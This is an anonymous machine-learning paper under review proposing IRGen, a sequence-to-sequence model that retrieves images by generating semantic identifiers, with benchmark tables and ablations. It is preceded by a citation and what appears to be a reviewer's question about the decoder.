Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. arXiv preprint arXiv:1810.04805, 2019.
EMCXCTsmSx
Seems like we can directly use the codes from the semantic tokenizer for image retrieval -- similar to how product quantization performs retrieval. What is the necessity of employing the decoder? What is the disadvantage, and how much does performance degrade, if we just use the semantic tokenizer's codes for retrieval?
IRGen: Generative Modeling for Image Retrieval

Anonymous authors
Paper under double-blind review

Abstract

While generative modeling has become prevalent across numerous research fields, its potential application to image retrieval has yet to be thoroughly justified. In this paper, we present a novel approach, reframing image retrieval as a variant of generative modeling and employing a sequence-to-sequence model. This provides promising alignment with the overarching theme of unification in current research. Our framework enables end-to-end differentiable search, leading to superior performance through direct optimization. During the development of IRGen, we tackle the key technical challenge of converting an image into a concise sequence of semantic units, which is essential to facilitating efficient and effective search. Extensive experiments demonstrate that our model yields significant improvements over various widely utilized benchmarks, and we further validate its performance on million-scale datasets. The most intriguing finding lies in the substantial enhancement of precision scores achieved through generative modeling, which potentially opens the avenue to excluding the rerank stage typically utilized in practical retrieval pipelines.

## 1 Introduction

Generative modeling has made significant progress in a wide range of tasks including machine translation (Vaswani et al., 2017), conversational modeling (Devlin et al., 2018; Brown et al., 2020; Ouyang et al., 2022; Adiwardana et al., 2020), image captioning (Yu et al., 2022a), image classification (Chen et al., 2020), text-to-image synthesis (Ramesh et al., 2022; Ding et al., 2022), and many more. Originating from language and then expanding to other modalities with specially designed tokenizers, such a universal modeling approach provides a promising direction for unifying different tasks into a versatile pretrained model, which has attracted widespread attention (Alayrac et al., 2022; Wang et al., 2022a; Ouyang et al., 2022; Li et al., 2023). Yet its potential for image retrieval remains unexplored. This paper takes the unification trend one step further and investigates generative modeling for image retrieval.

A practical retrieval system generally consists of two stages: feature representation learning (El-Nouby et al., 2021; Liu et al., 2022; Lee et al., 2022b; Yang et al., 2021) and Approximate Nearest Neighbor (ANN) search (Babenko & Lempitsky, 2014b; Johnson et al., 2019; Guo et al., 2020; Chen et al., 2021). Most image retrieval methods focus on only one individual stage, ignoring the fact that both stages are inherently and deeply connected in actual service. Thus, a practical system often requires careful per-task hyperparameter tuning to make the most of the coordination between feature extraction and ANN search. While recent progress (Gao et al., 2020; De Cao et al., 2020; Wang et al., 2022b; Tay et al., 2022) has been made towards end-to-end search in the scenarios of recommendation, entity retrieval and document retrieval, little has been done for image retrieval.

In this paper, we cast image retrieval as a form of generative modeling and make use of the standard Transformer architecture, as in GPT (Brown et al., 2020; Radford et al., 2019; 2018), to enable end-to-end differentiable search. Our model, IRGen, is a sequence-to-sequence model that, given a query image, directly generates identifiers corresponding to the query's nearest neighbors.
Specifically, the model takes a query image as input and autoregressively predicts discrete visual tokens, which serve as the identifier of an image. The predicted visual tokens are supposed to point to the query image's nearest neighbor. As such, IRGen can be trained directly from the final retrieval target, starting with raw images.

Two fundamental concerns need to be addressed to enable efficient and effective image retrieval using generative modeling. First, autoregressive generative modeling is notorious for its slow sampling process due to its inherently sequential nature, so the run-time cost of retrieval grows at least linearly with the sequence length. Second, it is particularly difficult to model the semantic relationships between identifiers if we drastically shorten the image identifier. A semantic tokenizer specially designed for image retrieval is therefore an immediate need. We observe that existing image tokenizers (Van Den Oord et al., 2017; Lee et al., 2022a), normally designed for image generation tasks, are not suitable for the image retrieval task, leading to poor performance, as analyzed in our experiments. We hence propose several key ingredients: first, inject semantic information by applying image-level supervision rather than pixel-level reconstructive supervision; second, generate dependent tokens in a sequence by leveraging the recursive property of residual quantization; and lastly, ensure fast inference speed by tremendously reducing the length of the sequence through exploiting the global feature instead of spatial patch embeddings. Furthermore, we intentionally adopt the standard Transformer architecture so that it is easy to scale up the model using existing techniques and infrastructure.

The proposed IRGen model has set new records across a diverse range of image retrieval datasets, owing to its end-to-end differentiable search capability. It consistently outperforms previous strong competitors by a significant margin, sometimes even surpassing linear scan search methods. For instance, when compared with the best baseline methods, which include linear scan search, our model achieves remarkable improvements, such as a 20.2% increase in precision@10 on the In-shop Clothes dataset (Liu et al., 2016), a 6.0% boost in precision@2 on CUB200 (Wah et al., 2011) and a 2.4% enhancement in precision@2 on Cars196 (Krause et al., 2013). To assess the scalability of our model, we further experiment on million-scale datasets, namely ImageNet (Deng et al., 2009) and Places365 (Zhou et al., 2017a), and demonstrate consistently superior performance in these challenging scenarios.

It is our belief that generative models have the potential to redefine the landscape of image retrieval. The application of generative modeling to image retrieval tasks not only represents an exciting opportunity but also has the potential to unify information retrieval across various modalities. At a technical level, our model, IRGen, effortlessly bridges the gap between feature representation learning and approximate search, creating an end-to-end differentiable framework that enables direct optimization based on retrieval objectives. Furthermore, the entire framework is conceptually straightforward, with all components relying on the standard Transformer architecture, renowned for its remarkable scalability (Du et al., 2022; Chowdhery et al., 2022; Shoeybi et al., 2019; Xu et al., 2021).
To the best of our knowledge, our work marks the pioneering exploration of generative modeling in the domain of image retrieval, extending the boundaries of generative modeling into new territories. Along this journey, we have introduced a fundamentally distinct retrieval approach that has demonstrated impressive performance on various retrieval benchmarks.

## 2 Method

### 2.1 Semantic Image Tokenizer

As the Transformer becomes the ubiquitous architecture in computer vision, many successful image tokenizers have emerged, such as VQ-VAE (Van Den Oord et al., 2017; Ramesh et al., 2021; Gafni et al., 2022; Yu et al., 2021), RQ-VAE (Lee et al., 2022a) and so on. Basically, these methods learn a variational auto-encoder with discrete latent variables, together with a learnable and indexable codebook, over a collection of raw images. As a result, an image is represented as a sequence of discrete codes indexing entries of the codebook. A proper combination of entries can be decoded to a high-quality image through the decoder. Such tokenizers have been widely applied to image synthesis and can easily be extended to audio and video synthesis.

Despite their success in image generation, we believe that this approach may not be well-suited for the retrieval task, for several reasons. Firstly, the process of decoding latent codes to reconstruct raw images is essential for generating images in synthesis tasks but is not required for retrieval tasks. Secondly, the length of the code sequence has a significant impact on the inference speed of autoregressive models, which is crucial for efficient search in our case. It is particularly challenging to handle very short sequences of codes, whereas current code sequences used for retrieval are often quite long (e.g., the $8 \times 8$ feature map with a depth of 4 in RQ-VAE results in a sequence length of 256). Additionally, for retrieval it is important to inject semantic information into the latent codes, while the image reconstruction loss commonly used in generative models tends to focus on low-level details, including imperceptible local details and noise.

Building on the insights mentioned above, we suggest exploiting the global feature extracted from the class token instead of relying on the default spatial tokens. This approach offers a substantial reduction in sequence length (from 64 tokens down to just 1 token). Additionally, as a byproduct of this strategy, the class token inherently provides a condensed, high-level semantic representation. Let $f_{cls}$ denote the $d$-dimensional feature vector outputted from the class token, which is taken as the image representation. We adopt residual quantization (RQ), or stacked composite quantization, to approximate this feature. Suppose there are $M$ codebooks, each containing $\hat{L}$ elements, $C_m = \{c_{m1}, \cdots, c_{m\hat{L}}\}$. RQ recursively maps the embedding $f_{cls}$ to $M$ sequentially ordered codes, $f_{cls} \rightarrow \{l_1, l_2, \cdots, l_M\} \in [\hat{L}]^M$. Letting $r_0 = f_{cls}$, we have

$$l_m = \arg\min_{l \in [\hat{L}]} \|r_{m-1} - c_{ml}\|_2^2, \quad (1)$$

$$r_m = r_{m-1} - c_{m l_m}, \quad m = 1, 2, \cdots, M. \quad (2)$$

The process of sequentially generating discrete codes is inherently compatible with sequential autoregressive generation. This alignment helps alleviate the optimization challenges associated with modeling the relationships within identifiers.
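For illustration, a minimal sketch of this residual quantization is shown below; `codebooks` stands in for the learned codebooks $C_1, \ldots, C_M$.

```python
import torch

def residual_quantize(f_cls: torch.Tensor, codebooks: torch.Tensor):
    """Recursively quantize a class-token feature into M codes (Equations 1 and 2).

    f_cls:     (d,) global image feature
    codebooks: (M, L, d) stack of M codebooks with L entries each
    """
    residual, codes = f_cls, []
    for C in codebooks:                                   # C: (L, d)
        dists = ((residual.unsqueeze(0) - C) ** 2).sum(-1)
        l_m = int(dists.argmin())                         # nearest codebook entry (Equation 1)
        codes.append(l_m)
        residual = residual - C[l_m]                      # subtract and recurse (Equation 2)
    return codes                                          # the image identifier (l_1, ..., l_M)
```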
To further inject semantic priors, we train the network under a classification loss over both the original embeddings and the reconstructed embeddings. In particular, we consider a series of reconstruction levels denoted as $\hat{f}_{cls}^{\leq m} = \sum_{i=1}^{m} c_{i l_i}$, $m = 1, 2, \cdots, M$. Each prefix of codes thus encodes semantic information to a certain degree. Adding up the $M$ levels of partial reconstruction error, the complete objective function is then formulated as

$$L = L_{cls}(f_{cls}) + \lambda_1 \sum_{m=1}^{M} L_{cls}(\hat{f}_{cls}^{\leq m}) + \lambda_2 \sum_{m=1}^{M} \|r_m\|_2^2,$$

$$r_m = f_{cls} - \mathrm{sg}[\hat{f}_{cls}^{\leq m}], \quad m = 1, 2, \cdots, M, \quad (3)$$

where $\mathrm{sg}[\cdot]$ is the stop-gradient operator. During training, we adopt alternating optimization to update the codebook and the network. For computing the gradient of $L_{cls}(\hat{f}_{cls}^{\leq m})$, we follow the straight-through estimator (Bengio et al., 2013), as in (Van Den Oord et al., 2017), and approximate the gradient by copying the gradients at $\hat{f}_{cls}^{\leq m}$ directly to $f_{cls}$. After optimization, we hope that images of similar classes have similar codes. In the experiments, we present comparisons with other discrete identifiers, including random codes and codes from a hierarchical k-means algorithm or from RQ-VAE.

### 2.2 Encoder-Decoder for Autoregressive Retrieval

Once we have established a robust discrete latent structure equipped with semantic priors, our next step is to train a powerful autoregressive sequence-to-sequence model solely on these discrete random variables, without referring to their visual content. Our encoder-decoder architecture decouples the input embedding from the generation of discrete codes. The model begins by taking a query image as input to obtain the query embedding, which is then used to produce the discrete codes. It is worth noting that the yielded discrete codes represent the query's nearest neighbor images within the database. Therefore, our training process involves image pairs $(x_1, x_2)$, where $x_2$ is the nearest neighbor of $x_1$. Our model's objective is to predict the identifier of $x_2$ when given $x_1$ as input. This setup allows the model to learn the semantic relationships between images in the dataset. Figure 1 provides a concise view of our training pipeline.

To be specific, let the encoder, based on the ViT-Base architecture, be denoted as $E$, and the decoder as $D$, a standard Transformer that includes causal self-attention, cross-attention and MLP layers. We leverage the spatial tokens outputted from the encoder as the input embedding, $e = E(x_1)$, which is injected into the decoder through cross-attention. Our training objective is to predict the next token in the image identifier sequence. Specifically, we aim to maximize the probability of the $m$-th token of the image identifier given the input embedding and the previously predicted tokens, $p(l_m | x_1, l_1, \cdots, l_{m-1}, \theta)$, where $\theta$ denotes the parameters of both $D$ and $E$, and $l_1, l_2, \cdots, l_M$ are the $M$ tokens that make up the image identifier of $x_2$, generated by the image tokenizer. By maximizing the probability of each token, we effectively maximize the likelihood of generating the image identifier of an image,

$$p(l_1, \ldots, l_M | x_1, \theta) = \prod_{m=1}^{M} p(l_m | x_1, l_1, \ldots, l_{m-1}, \theta). \quad (4)$$

We apply a softmax cross-entropy loss over the codebook entries at each of the $M$ decoding steps during training.
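A minimal sketch of this training objective is given below; the `decoder` interface (causal self-attention with cross-attention to the query embedding, returning per-step logits over the codebook) and the start-of-sequence convention are assumptions for illustration.

```python
import torch
import torch.nn.functional as F

def ar_identifier_loss(decoder, query_emb, target_codes):
    """Teacher-forced next-token loss over the identifier sequence.

    query_emb:    (B, num_patches, d) encoder output e = E(x1), injected via cross-attention
    target_codes: (B, M) identifier of x1's nearest neighbor x2, from the tokenizer
    """
    bos = torch.zeros_like(target_codes[:, :1])            # assumed start-of-sequence token id
    inputs = torch.cat([bos, target_codes[:, :-1]], dim=1) # shift right: predict l_m from l_<m
    logits = decoder(inputs, context=query_emb)            # (B, M, L) scores over codebook entries
    return F.cross_entropy(logits.transpose(1, 2), target_codes)
```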
This loss guides the model to generate the correct sequence of tokens that represent the image identifier.

### 2.3 Beam Search

During inference, given a query image $q$, we first calculate the query embedding with the encoder $E$ and then generate the discrete codes through the decoder $D$, conditioned on the query embedding, in an autoregressive manner. These discrete codes represent an image that is considered the nearest neighbor of the query image. To perform top-$K$ retrieval, our model can use beam search, allowing us to find the top-$K$ images that are the closest matches to the query image. Specifically, when provided with a query image, our model employs an autoregressive approach to generate discrete codes, commencing with the start-of-sequence token. In contrast to the single candidate considered in greedy search, beam search maintains a "beam" of the top-$K$ candidates at each generation step. At each step, the candidates are ranked based on their scores, which are computed as the product of the probabilities associated with their individual elements. We retain only the top-$K$ sequences with the highest scores.

It is important to note that not all generated identifiers are necessarily valid: an identifier belonging to the set $[\hat{L}]^M$ may not correspond to any image within the retrieval database. Therefore, we must validate the generated image identifier at each step, which can be a time-consuming process. We expedite this validation by imposing constraints on the beam search, ensuring that it explores only within a prefix tree containing valid codes. This optimization enhances the efficiency of the retrieval process.

**Beam search vs. ANN search.** Indeed, there are certain similarities between beam search and approximate nearest neighbor (ANN) search, as both methods aim to select the top-$K$ most promising candidates by traversing tree-like data structures. However, they diverge significantly in how they calculate the score used to choose the current node. In ANN search, the score is typically determined by computing the distance between the query feature and the feature associated with the node, using a specific distance metric. In beam search, by contrast, the score, or probability, is produced by a differentiable neural network, often an autoregressive model, that is conditioned on the query and learns to estimate the score or probability of a candidate sequence. Consequently, the entire retrieval pipeline can be optimized in an end-to-end manner, taking advantage of neural network training techniques.
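A minimal sketch of the trie-constrained beam search described above is shown below; `step_logprobs` stands in for the autoregressive decoder conditioned on the query, and the prefix tree is built once over the identifiers of all database images.

```python
def build_trie(identifiers):
    """Prefix tree over valid identifiers, as nested dicts: token -> child node."""
    root = {}
    for codes in identifiers:               # one (l_1, ..., l_M) tuple per database image
        node = root
        for token in codes:
            node = node.setdefault(token, {})
    return root

def constrained_beam_search(step_logprobs, trie_root, M, beam_size):
    """Beam search that only expands prefixes present in the trie."""
    beams = [((), 0.0, trie_root)]          # (prefix, cumulative log-probability, trie node)
    for _ in range(M):
        candidates = []
        for prefix, score, node in beams:
            logp = step_logprobs(prefix)    # token -> log-probability from the AR decoder
            for token, child in node.items():   # expand only valid continuations
                candidates.append((prefix + (token,), score + logp[token], child))
        beams = sorted(candidates, key=lambda b: -b[1])[:beam_size]
    return [(prefix, score) for prefix, score, _ in beams]   # top-K identifiers
```

Because every retained prefix lies in the tree, every completed sequence is guaranteed to correspond to at least one database image, so no separate per-step validity check is needed.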
| Model | In-shop | CUB200 | Cars196 |
|---------------|---------|--------|---------|
| K | 1 | 10 | 20 | 30 | 1 | 2 | 4 | 8 | 1 | 2 | 4 | 8 |
| **Linear scan search** | | | | | | | | | | | | |
| Res101-Img | 30.7 | 10.2 | 7.1 | 5.8 | 46.8 | 43.6 | 39.9 | 34.9 | 25.9 | 22.0 | 18.5 | 15.4 |
| CLIP | 57.5 | 22.8 | 16.6 | 14.1 | 66.0 | 63.5 | 59.4 | 53.8 | 70.8 | 67.8 | 63.3 | 57.2 |
| CGD(repro) | 83.2 | 47.8 | 40.2 | 37.0 | 76.7 | 75.5 | 73.7 | 71.4 | 87.1 | 86.1 | 84.6 | 82.6 |
| IRT_R(repro) | 92.7 | 59.6 | 51.1 | 47.6 | 79.3 | 77.7 | 75.0 | 71.4 | 75.6 | 73.1 | 68.3 | 61.7 |
| FT-CLIP | 91.4 | 66.8 | 58.9 | 55.4 | 79.2 | 77.6 | 76.0 | 73.2 | 88.4 | 87.7 | 87.1 | 85.8 |
| **Faiss IVF PQ search** | | | | | | | | | | | | |
| CGD(repro) | 60.4 | 30.5 | 24.5 | 22.0 | 71.6 | 70.8 | 69.9 | 68.7 | 84.8 | 84.4 | 84.1 | 83.3 |
| IRT_R(repro) | 68.6 | 35.7 | 29.3 | 26.6 | 68.9 | 67.6 | 66.2 | 63.4 | 59.1 | 57.5 | 54.7 | 51.7 |
| FT-CLIP | 63.7 | 37.0 | 30.7 | 28.0 | 72.6 | 72.1 | 71.2 | 69.7 | 86.5 | 86.3 | 86.2 | 86.0 |
| **ScaNN search** | | | | | | | | | | | | |
| CGD(repro) | 83.0 | 47.7 | 40.3 | 37.2 | 76.7 | 75.2 | 73.8 | 71.4 | 87.1 | 86.1 | 84.5 | 82.6 |
| IRT_R(repro) | 92.0 | 58.2 | 50.0 | 46.6 | 79.3 | 77.7 | 75.1 | 71.4 | 75.4 | 72.8 | 68.1 | 61.6 |
| FT-CLIP | 90.4 | 64.6 | 56.9 | 53.5 | 79.2 | 77.5 | 76.0 | 73.2 | 88.3 | 87.7 | 87.1 | 85.8 |
| **SPANN search** | | | | | | | | | | | | |
| CGD(repro) | 83.0 | 47.7 | 40.3 | 37.1 | 76.7 | 75.5 | 73.7 | 71.4 | 87.0 | 86.1 | 84.6 | 82.6 |
| IRT_R(repro) | 91.4 | 56.2 | 47.9 | 44.5 | 79.3 | 77.6 | 75.0 | 71.4 | 74.8 | 72.4 | 67.6 | 61.1 |
| FT-CLIP | 90.2 | 62.9 | 55.1 | 51.8 | 78.5 | 77.6 | 76.0 | 73.2 | 88.6 | 88.1 | 87.5 | 86.3 |
| **Beam search** | | | | | | | | | | | | |
| IRGen (ours) | 92.4 | 87.0 | 86.6 | 86.5 | 82.7 | 82.7 | 83.0 | 82.8 | 90.1 | 89.9 | 90.2 | 90.5 |

Table 1: Precision comparison with different baselines, for which we consider linear scan search, Faiss IVF PQ search, ScaNN search and SPANN search. (repro) denotes models reproduced by ourselves to ensure the same data processing and comparable model size for fair comparison. Our model adopts beam search for retrieval, achieving significant improvements and performing even better than linear scan search.

## 3 Experiments

We conduct comprehensive evaluations to demonstrate the performance of the proposed IRGen. We first evaluate our method on common image retrieval datasets and then on two large-scale datasets, ImageNet (Deng et al., 2009) and Places365 (Zhou et al., 2017a). For a detailed description of the datasets and implementation details, please refer to the appendix.

**Baselines.** We evaluate our model's performance in comparison to five competitive baselines: 1) ResNet-101 (He et al., 2016) trained on the ImageNet dataset, denoted Res101-Img, which is commonly used as a feature extraction tool for various tasks; 2) CLIP (Radford et al., 2021), trained on 400M image-text pairs and known for its powerful zero-shot capability; 3) CGD (Jin et al., 2019), a state-of-the-art method based on ResNet; 4) IRT (El-Nouby et al., 2021), a Transformer-based model for image retrieval, of which we use the best-performing variant IRT_R; 5) FT-CLIP, a baseline finetuned from CLIP on the target dataset. For both CGD and IRT, we have reproduced the models to ensure consistent data processing and comparable model sizes. Specifically, we use ResNet-101 for CGD and DeiT-B for IRT. We also provide their best results from the original papers for reference.

**Search process.**
The baseline models primarily focus on effective feature learning. After training, these models are used to extract features for the database images. During search, a given query image is first passed through the model to obtain its query feature. This query feature is then compared with the features of database images using a specific distance metric. Following the conventions established in previous works (Radford et al., 2021; Jin et al., 2019; El-Nouby et al., 2021), we employ the cosine distance for the CLIP model and the Euclidean distance for the other baseline models. We evaluate two search strategies: linear scan search (K-nearest neighbors, or KNN) and approximate nearest neighbor (ANN) search. Linear scan search is known for its accuracy but is computationally intensive. In contrast, ANN search is significantly more efficient. For ANN, we explore: (i) the popular Faiss IVF PQ (Johnson et al., 2019); (ii) the state-of-the-art memory-based algorithm ScaNN (Guo et al., 2020) with the default setting; and (iii) the state-of-the-art disk-based SPANN algorithm (Chen et al., 2021). These evaluation strategies allow us to assess the retrieval performance of our model against a variety of search methods.

### 3.1 Results

Table 1 presents a detailed performance comparison in terms of precision@K, which measures the percentage of retrieved candidates that share the same class as the query among the top K results.

| Model | In-shop | CUB200 | Cars196 |
|-------------|---------|--------|---------|
| K | 1 | 10 | 20 | 30 | 1 | 2 | 4 | 8 | 1 | 2 | 4 | 8 |
| **Linear scan search** | | | | | | | | | | | | |
| Res101-Img | 30.7 | 55.9 | 62.7 | 66.8 | 46.8 | 59.9 | 71.7 | 80.8 | 25.9 | 35.6 | 47.0 | 59.7 |
| CLIP | 57.5 | 83.0 | 87.5 | 89.7 | 66.0 | 78.1 | 87.7 | 93.5 | 70.8 | 82.6 | 91.1 | 95.9 |
| CGD* | 91.9 | 98.1 | 98.7 | 99.0 | 79.2 | 86.6 | 92.0 | 95.1 | 94.8 | 97.1 | 98.2 | 98.8 |
| IRT_R* | 91.9 | 98.1 | 98.7 | 99.0 | 79.6 | 85.0 | 91.1 | 94.3 | - | - | - | - |
| FT-CLIP | 91.4 | 97.3 | 98.1 | 98.5 | 79.2 | 85.0 | 89.3 | 92.0 | 88.4 | 90.5 | 92.5 | 93.8 |
| **Faiss IVF PQ search** | | | | | | | | | | | | |
| CGD(repro) | 60.4 | 76.0 | 77.1 | 77.4 | 71.6 | 77.4 | 81.5 | 84.2 | 84.8 | 88.0 | 89.8 | 91.0 |
| IRT_R(repro)| 68.6 | 79.2 | 80.0 | 80.2 | 68.9 | 77.9 | 85.0 | 89.3 | 59.1 | 70.4 | 78.2 | 83.4 |
| FT-CLIP | 63.7 | 70.7 | 71.1 | 71.2 | 72.6 | 78.0 | 82.3 | 85.2 | 86.5 | 86.9 | 87.2 | 87.5 |
| **ScaNN search** | | | | | | | | | | | | |
| CGD(repro) | 83.0 | 94.8 | 96.2 | 96.7 | 76.7 | 83.5 | 88.0 | 91.8 | 87.1 | 91.7 | 94.6 | 96.6 |
| IRT_R(repro)| 92.0 | 97.8 | 98.3 | 98.4 | 79.3 | 86.8 | 91.9 | 94.7 | 75.4 | 84.7 | 90.9 | 95.0 |
| FT-CLIP | 90.4 | 95.9 | 96.6 | 96.9 | 79.2 | 85.0 | 89.2 | 92.7 | 88.3 | 90.5 | 92.4 | 93.7 |
| **SPANN search** | | | | | | | | | | | | |
| CGD(repro) | 83.0 | 95.0 | 96.4 | 96.9 | 76.7 | 83.4 | 87.9 | 91.8 | 87.0 | 91.7 | 94.6 | 96.7 |
| IRT_R(repro)| 91.4 | 97.2 | 97.6 | 97.7 | 79.3 | 86.8 | 91.9 | 94.7 | 74.8 | 84.3 | 90.5 | 94.7 |
| FT-CLIP | 90.2 | 95.8 | 96.7 | 97.0 | 78.5 | 85.0 | 89.4 | 92.9 | 88.6 | 90.7 | 92.5 | 94.2 |
| **Beam search** | | | | | | | | | | | | |
| IRGen (ours) | 92.4 | 96.8 | 97.6 | 97.9 | 82.7 | 86.4 | 89.2 | 91.4 | 90.1 | 92.1 | 93.2 | 93.7 |

Table 2: Recall comparison with different baselines, for which we consider linear scan search, Faiss IVF PQ search, ScaNN search and SPANN search. (repro) denotes models reproduced by ourselves to ensure the same data processing and comparable model size for fair comparison. We include the best results of CGD and IRT from their original papers for context, marked with *.
Our model adopts beam search for retrieval, achieving comparable performance in most cases.

Our model consistently outperforms all other models, even surpassing those employing linear scan search. Notably, we achieve remarkable improvements, such as a 20.2% boost in precision@10 on the In-shop Clothes dataset, a 6.0% increase in precision@2 on the CUB200 dataset, and a 2.4% gain in precision@2 on the Cars196 dataset. Furthermore, several observations can be made: 1) Finetuned models, tailored to specific datasets, exhibit significantly better performance than off-the-shelf feature extractors like CLIP and ImageNet-pretrained ResNet-101. 2) Generally, models equipped with ANN algorithms perform slightly worse than their counterparts using linear scan search. However, there are exceptions, such as FT-CLIP with SPANN search on the Cars196 dataset, which demonstrates the importance of end-to-end optimization. 3) Our model consistently maintains high precision scores as $K$ increases, while other models experience a substantial drop.

Table 2 provides a comparison of different models using the Recall@K metric. Recall@K measures the proportion of queries for which at least one image among the top $K$ retrieved candidates shares the same label as the query image, yielding a score of 1 if true and 0 otherwise. The table also includes the best recall results of CGD and IRT from their respective original papers for reference. It is important to note that these models may use different data preprocessing, model sizes, and additional training techniques. Here are the key observations: 1) Our IRGen model achieves the highest Recall@1 score of all models. For the other recall scores, however, our model performs similarly or slightly worse. This discrepancy may arise from the current objective loss used in autoregressive models, which heavily optimizes for Recall@1 while placing less emphasis on other recall values. One potential solution is to incorporate the beam search process into training for joint optimization. 2) Different combinations of feature extractors and ANN algorithms exhibit significant variation across the three datasets, highlighting the challenge of achieving coordination in practical scenarios. 3) Notably, despite the high recall achieved by the baselines, they often require an additional re-ranking stage to improve precision, whereas our model already attains high precision scores without the need for re-ranking.

Figure 2 illustrates the precision-recall curve, where recall represents the true positive rate. Our approach, IRGen, consistently delivers outstanding performance, maintaining high precision and recall simultaneously. In addition to precision-recall analysis, we evaluate our model using the mean reciprocal rank (MRR) metric, which measures the inverse of the rank of the first relevant item. We compute MRR for four different values, 1, 2, 4 and 8, and display the corresponding curves in Figure 3. The baselines employ the SPANN retrieval algorithm. Our IRGen model consistently outperforms the baselines across all evaluated metrics, confirming the effectiveness of our framework.

Figure 2: Precision-Recall (TPR) curve comparison for different methods on (a) In-shop Clothes, (b) CUB200 and (c) Cars196 datasets.

Figure 3: MRR with respect to 1, 2, 4 and 8 for different methods on (a) In-shop Clothes, (b) CUB200 and (c) Cars196 datasets.
Notably, there is significant variability in the performance gap between each baseline and our model across the three datasets, highlighting the challenges and the dataset-dependent nature of retrieval tasks.

**Results on million-level datasets.** We further evaluate our approach on the ImageNet dataset (Deng et al., 2009), which contains 1,281,167 images, and on Places365-Standard (Zhou et al., 2017a), which contains about 1.8M images from 365 scene categories. We compare against strong baselines, including the CLIP model as well as the FT-CLIP model finetuned from CLIP. The comparison is reported in Figure 4 and Table 3, focusing on precision@K and MAP@100. Our IRGen model consistently outperforms the baselines, achieving the best results on both metrics. The precision values of our model remain consistently high as K increases, while the baselines experience noticeable performance degradation. These results confirm the effectiveness of our model on large-scale datasets such as ImageNet, where it maintains high precision across varying values of K and outperforms the baseline models.

3.2 Ablations

**The effect of identifiers.** In our study of image identifiers, we compared three approaches: (1) assigning random identifiers to images, (2) hierarchical k-means (HKM), and (3) using the image tokenizer RQ-VAE (Lee et al., 2022a). The results are summarized in Table 5. Randomly assigning identifiers yielded expectedly lower performance: models with random identifiers must learn not only the interaction between queries and image identifiers but also allocate capacity to learning relationships within the identifiers themselves. HKM performed better than random assignment, underscoring the significance of semantic identifiers. However, our proposed semantic image identifiers demonstrated a clear improvement over HKM, highlighting their effectiveness in enhancing retrieval performance. In contrast, the performance of RQ-VAE trailed far behind our model, with precision below 10 percent. We attribute this to the sequence length in RQ-VAE being too long for the model to effectively capture relationships within the identifiers.

**Generalize to new data.** Addressing the inclusion of fresh data is particularly significant in search scenarios. To assess this capacity, we conducted the following experiment (see Table 4).

| Dataset | CLIP | FT-CLIP | IRGen (ours) |
|-----------|------|---------|--------------|
| ImageNet | 44.1 | 65.5 | **76.0** |
| Places365 | 22.1 | 30.3 | **44.3** |

Table 3: MAP@100 comparison on two million-level datasets. The results of CLIP and FT-CLIP are retrieved by SPANN.

| Model | Precision |
|------------------------|--------------------------|
| FT-CLIP + Linear Scan | 70.6 / 65.0 / 55.6 |
| IRGen (Ours) | **77.0** / **77.9** / **77.4** |

Table 4: Generalization to new data. We split off 5% of the training data from the ImageNet dataset for inference; this split remained unseen during training.

Figure 4: Precision comparison on large-scale datasets: ImageNet and Places365.

| Identifier | T | Precision@1 | @10 | @20 | Recall@1 | @10 | @20 |
|------------|---|------|------|------|------|------|------|
| Random | 4 | 87.6 | 75.4 | 70.8 | 87.6 | 95.1 | 96.0 |
| HKM100 | 4 | 88.2 | 80.0 | 78.2 | 87.2 | 93.1 | 94.3 |
| HKM200 | 3 | 89.0 | 81.6 | 79.8 | 89.0 | 93.9 | 94.9 |
| Ours | 4 | **92.4** | **87.0** | **86.6** | **92.4** | **96.8** | **97.6** |

Table 5: Ablation study on the image identifier (T denotes the identifier length).
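For context on the HKM baselines in Table 5, the following is a minimal sketch of assigning hierarchical k-means identifiers to precomputed image embeddings; it assumes scikit-learn and is an illustration of the baseline, not the paper's semantic tokenizer.

```python
import numpy as np
from sklearn.cluster import KMeans

def hkm_identifiers(embeddings: np.ndarray, branching: int, depth: int) -> np.ndarray:
    """Assign each image a length-`depth` identifier via recursive k-means."""
    ids = np.zeros((len(embeddings), depth), dtype=int)

    def recurse(index: np.ndarray, level: int) -> None:
        if level == depth or len(index) < 2:
            return
        k = min(branching, len(index))
        labels = KMeans(n_clusters=k, n_init=10).fit_predict(embeddings[index])
        ids[index, level] = labels
        for c in range(k):
            recurse(index[labels == c], level + 1)

    recurse(np.arange(len(embeddings)), 0)
    return ids

# Example: 100 random 16-d embeddings -> length-3 identifiers with branching 4.
codes = hkm_identifiers(np.random.randn(100, 16), branching=4, depth=3)
print(codes[:5])  # each row is a coarse-to-fine identifier, e.g. [2 0 3]
```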
We intentionally withheld 5% of the training data from the ImageNet dataset during the training phase and introduced it during inference, all without updating the existing codebook and autoregressive (AR) model. In this experiment, we compared the performance of our model with the formidable baseline FT-CLIP, equipped with a linear scan search. The results, displayed in Table 4, reveal that our model maintains superior performance even when confronted with new data. This observation highlights our model's remarkable ability to generalize effectively to previously unseen data. This capability is attributed to the fact that our model can derive semantic identifiers for newly introduced images using the codebook, leveraging the knowledge it has acquired through the autoregressive decoder. The AR model excels at capturing the semantic structure embedded within the database through its learned parameters.

**Inference throughput.** In addition to search accuracy, search efficiency is a critical criterion for retrieval systems. To assess the time cost of our autoregressive (AR) model, we conducted our analysis on an NVIDIA V100-16G GPU. In Figure 5, we present the throughput for 100 queries, with beam sizes of 1, 10, 20, and 30 for comparison. Additionally, we break down the time cost of each component during retrieval. The results show that the encoder is quite fast, while the autoregressive decoder becomes the major bottleneck, especially as the beam size increases. Additional time is consumed checking the validity of predictions, since a predicted identifier may not exist in the database. Overall, the time cost is within an acceptable range: for instance, approximately 0.07 seconds per query with a beam size of 10, or 0.19 seconds with a beam size of 30. It is important to highlight that our model operates as an end-to-end retrieval method that does not include a re-ranking step. In practical applications, re-ranking is typically necessary to achieve higher precision, but it can significantly increase the time required for retrieval.

### 4 RELATED WORK

